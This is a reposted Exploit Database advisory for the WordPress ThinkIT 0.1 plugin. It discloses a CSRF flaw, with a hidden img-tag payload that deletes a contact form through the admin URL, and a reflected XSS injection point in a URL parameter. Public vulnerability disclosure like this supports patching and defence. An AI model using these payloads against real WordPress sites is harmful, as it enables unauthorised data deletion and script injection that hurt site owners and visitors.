WordPress Plugin ThinkIT 0.1 – Multiple Vulnerabilities

• Exploit Database
• 109 阅读

• 作者： Yashar shahinzadeh
  日期： 2013-08-21
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/27751/
• 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36

  ################################################################################################################################### # Exploit Title: WordPress ThinkIT plugin - CSRF / XSS # Date: 2013 15 August # Exploit Author: Yashar shahinzadeh # Special thanks to Mormoroth # Credit goes for: http://y-shahinzadeh.ir & ha.cker.ir # Vendor Homepage: http://thinkoverit.com/ # Tested on: Linux & Windows, PHP 5.2.9 # Affected Version :0.1 # # Contacts: { http://Twitter.com/YShahinzadeh , http://y-shahinzadeh.ir , http://Twitter.com/Mormoroth , http://mormoroth.ir } ###################################################################################################################################   Summary: ======== 1. CSRF - Delete a form 2. Cross site scripting     1. CSRF - Delete a form: ========================   Contact form ID can be easily understood from HTML page source, <input type="hidden" value="[ID]" name="toit-form-id"></input>, which [ID] is the form ID, following crafted exploit may be used so as to delete form completely:   <img src="http://[WP]/wp-admin/admin.php?toitcf_current_id=[ID]&action=delete&page=toitcf" width="1" height="1">   Obviously, ID must be replaced.     2. Cross site scripting: ======================== http://[WP]/wordpress/wp-admin/admin.php?toitcf_current_id=[XSS]&page=toitcf     /** Yasshar shahinzadeh **/